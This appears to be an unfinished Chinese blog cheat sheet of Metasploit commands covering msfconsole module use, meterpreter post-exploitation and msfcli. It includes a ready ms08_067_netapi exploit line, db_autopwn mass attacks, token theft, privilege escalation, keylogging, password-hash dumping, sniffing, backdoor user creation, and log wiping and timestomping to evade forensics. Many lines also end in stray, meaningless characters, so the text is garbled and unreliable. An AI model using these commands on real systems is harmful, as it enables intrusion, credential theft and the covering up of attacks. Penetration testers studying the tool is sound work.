命令: show exploits
列出metasploit框架中的所有滲透攻擊模塊褪迟。
命令:show payloads
列出metasploit框架中的所有攻擊載荷。
命令:show auxiliary
列出metasploit框架中的所有輔助攻擊載荷艘狭。
命令:search name
查找metasploit框架中所有的滲透攻擊和其他模塊贝椿。
命令:info
展示出制定滲透攻擊或模塊的相關(guān)信息。
命令:use name
裝載一個(gè)滲透攻擊或模塊园欣。
命令:LHOST
你本地可以讓目標(biāo)主機(jī)連接的IP地址锭汛,通常當(dāng)目標(biāo)主機(jī)不在同一個(gè)局域網(wǎng)內(nèi)時(shí)昵慌,就需要是一個(gè)公共IP地址秃臣,特別為反彈式shell使用涧衙。
命令:RHOST
遠(yuǎn)程主機(jī)或是目標(biāo)主機(jī)。
命令:set function
設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。
命令:setg function
以全局方式設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))弧哎。
命令:show options
列出某個(gè)滲透攻擊或模塊中所有的配置參數(shù)雁比。
命令:show targets
列出滲透攻擊所有支持的目標(biāo)平臺(tái)。
命令:set target num
指定你所知道的目標(biāo)的操作系統(tǒng)以及補(bǔ)丁版本類型傻铣。
命令:set payload name
指定想要使用的攻擊載荷章贞。
命令:show advanced
列出所有高級配置選項(xiàng)。
命令:set autorunscript migrate -f.
在滲透攻擊完成后非洲,將自動(dòng)遷移到另一個(gè)進(jìn)程。
命令:check
檢測目標(biāo)是否選定滲透攻擊存在相應(yīng)的安全漏洞蜕径。
命令:exploit
執(zhí)行滲透攻擊或模塊來攻擊目標(biāo)两踏。
命令:exploit -j
在計(jì)劃任務(wù)下進(jìn)行滲透攻擊(攻擊將在后臺(tái)進(jìn)行)。
命令:exploit -z
滲透攻擊完成后不與回話進(jìn)行交互兜喻。
命令:exploit -e encoder
制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)梦染。
命令:exploit -h
列出exploit命令的幫助信息。
命令:sessions -l
列出可用的交互會(huì)話(在處理多個(gè)shell時(shí)使用)朴皆。
命令:sessions -l -v
列出所有可用的交互會(huì)話以及詳細(xì)信息帕识,EG:攻擊系統(tǒng)時(shí)使用了哪個(gè)安全漏洞。
命令:sessions -s script
在所有活躍的metasploit會(huì)話中運(yùn)行一個(gè)特定的metasploit腳本遂铡。
命令:sessions -K
殺死所有活躍的交互會(huì)話肮疗。
命令:sessions -c cmd
在所有活躍的metasploit會(huì)話上執(zhí)行一個(gè)命令。
命令:sessions -u sessionID
升級一個(gè)普通的win32 shell到metasploit shell扒接。
命令:db_create name
創(chuàng)建一個(gè)數(shù)據(jù)庫驅(qū)動(dòng)攻擊所要使用的數(shù)據(jù)庫(EG:db_create autopwn)伪货。
命令:db_connect name
創(chuàng)建并連接一個(gè)數(shù)據(jù)庫驅(qū)動(dòng)攻擊所要使用的數(shù)據(jù)庫(EG:db_connect user:passwd@ip/sqlname)。
命令:db_namp
利用nmap并把掃描數(shù)據(jù)存儲(chǔ)到數(shù)據(jù)庫中(支持普通的nmap語句钾怔,EG:-sT -v -P0)碱呼。
命令:db_autopwn -h
展示出db_autopwn命令的幫助信息。
命令:db_autopwn -p -r -e
對所有發(fā)現(xiàn)的開放端口執(zhí)行db_autopwn宗侦,攻擊所有系統(tǒng)愚臀,并使用一個(gè)反彈式shell。
命令:db_destroy
刪除當(dāng)前數(shù)據(jù)庫矾利。
命令:db_destroy user:passwd@host:port/database
使用高級選項(xiàng)來刪除數(shù)據(jù)庫姑裂。
metasploit命令
help
打開meterpreter使用幫助。
run scriptname
運(yùn)行meterpreter腳本梦皮,在scripts/meterpreter目錄下可查看到所有腳本名炭分。
sysinfo
列出受控主機(jī)的系統(tǒng)信息。
ls
列出目標(biāo)主機(jī)的文件和文件夾信息剑肯。
use priv
加載特權(quán)提升擴(kuò)展模塊捧毛,來擴(kuò)展metasploit庫。
ps
顯示所有運(yùn)行的進(jìn)程以及相關(guān)聯(lián)的用戶賬戶。
migrate PID
遷移到一個(gè)指定的進(jìn)程ID(PID號(hào)可通過ps命令從主機(jī)上獲得)呀忧。
use incognito
加載incognito功能(用來盜竊目標(biāo)主機(jī)的令牌或假冒用戶)
list_tokens -u
列出目標(biāo)主機(jī)用戶的可用令牌师痕。
list_tokens -g
列出目標(biāo)主機(jī)用戶組的可用令牌。
impersonate_token DOMAIN_NAME\USERNAME
假冒目標(biāo)主機(jī)上的可用令牌而账。
steal_token PID
盜竊給定進(jìn)程的可用令牌并進(jìn)行令牌假冒胰坟。
drop_token
停止假冒當(dāng)前令牌。
getsystem
通過各種攻擊向量來提升系統(tǒng)用戶權(quán)限泞辐。
execute -f cmd.exe -i
執(zhí)行cmd.exe命令并進(jìn)行交互笔横。
execute -f cmd.exe -i -t
以所有可用令牌來執(zhí)行cmd命令并隱藏該進(jìn)程。
rev2self
回到控制目標(biāo)主機(jī)的初始用戶賬戶下咐吼。
reg command
在目標(biāo)主機(jī)注冊表中進(jìn)行交互吹缔,創(chuàng)建,刪除锯茄,查詢等操作厢塘。
setdesktop number
切換到另一個(gè)用戶界面(該功能基于那些用戶已登錄)。
screenshot
對目標(biāo)主機(jī)的屏幕進(jìn)行截圖肌幽。
upload file
向目標(biāo)主機(jī)上傳文件晚碾。
download file
從目標(biāo)主機(jī)下載文件。
keyscan_start
針對遠(yuǎn)程目標(biāo)主機(jī)開啟鍵盤記錄功能喂急。
keyscan_dump
存儲(chǔ)目標(biāo)主機(jī)上捕獲的鍵盤記錄格嘁。
keyscan_stop
停止針對目標(biāo)主機(jī)的鍵盤記錄。
getprivs
盡可能多的獲取目標(biāo)主機(jī)上的特權(quán)煮岁。
uictl enable keyboard/mouse
接管目標(biāo)主機(jī)的鍵盤和鼠標(biāo)讥蔽。
background
將你當(dāng)前的metasploit shell轉(zhuǎn)為后臺(tái)執(zhí)行。
hashdump
導(dǎo)出目標(biāo)主機(jī)中的口令哈希值画机。
use sniffer
加載嗅探模式冶伞。
sniffer_interfaces
列出目標(biāo)主機(jī)所有開放的網(wǎng)絡(luò)端口。
sniffer_dump interfaceID pcapname
在目標(biāo)主機(jī)上啟動(dòng)嗅探步氏。
sniffer_start interfaceID packet-buffer
在目標(biāo)主機(jī)上針對特定范圍的數(shù)據(jù)包緩沖區(qū)啟動(dòng)嗅探响禽。
sniffer_stats interfaceID
獲取正在實(shí)施嗅探網(wǎng)絡(luò)接口的統(tǒng)計(jì)數(shù)據(jù)。
sniffer_stop interfaceID
停止嗅探荚醒。
add_user username password -h ip
在遠(yuǎn)程目標(biāo)主機(jī)上添加一個(gè)用戶芋类。
clearev
清楚目標(biāo)主機(jī)上的日志記錄。
timestomp
修改文件屬性界阁,例如修改文件的創(chuàng)建時(shí)間(反取證調(diào)查)侯繁。
reboot
重啟目標(biāo)主機(jī)。
MSFcli命令
msfcli | grep exploit
僅列出滲透攻擊模塊泡躯。
msfcli | grep exploit/windows
僅列出與windows相關(guān)的滲透攻擊模塊贮竟。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
對IP發(fā)起ms08_067_netapi滲透攻擊丽焊,配置了bind_tcp攻擊載荷,并綁定在PORT端口進(jìn)行監(jiān)聽咕别。
未完結(jié)
這個(gè)文章先放到這技健,因?yàn)檫€有一個(gè)msfvenom沒有寫。如果你有好的玩法(缺少的命令)惰拱,也可以留言在下面雌贱。